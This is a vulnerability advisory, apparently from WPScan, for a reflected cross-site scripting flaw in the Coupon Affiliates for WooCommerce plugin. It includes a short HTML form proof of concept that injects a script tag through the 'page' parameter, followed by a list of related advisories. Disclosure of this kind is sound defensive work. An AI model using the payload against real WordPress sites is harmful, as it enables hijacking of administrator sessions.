Coupon Affiliates for WooCommerce < 4.11.0.2 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not escape the page parameter in its Referral Visits dashboard before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

<html>
  <body>
    <form action="httsp://example.com/wp-admin/admin.php?page=wcusage_clicks" method="POST">
      <input type="hidden" name="page" value='"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

woo-coupon-usage

Fixed in 4.11.0.2

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

bf3e2546-85fb-4555-a406-60a3290dd743

Timeline

Publicly Published

2021-08-24 (about 4 years ago)

Added

2021-08-24 (about 4 years ago)

Last Updated

2021-08-24 (about 4 years ago)

Other

Published

Title

Published

2024-02-26

Title

Responsive Pricing Table < 5.1.11 - Author+ Stored XSS

Published

2024-12-13

Title

Post Carousel & Slider < 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-06-05

Title

Advanced Woo Labels – Product Labels for WooCommerce < 1.94 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-08-22

Title

Jobmonster < 4.8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2022-11-03

Title

reCAPTCHA <= 1.6 - Admin+ Stored XSS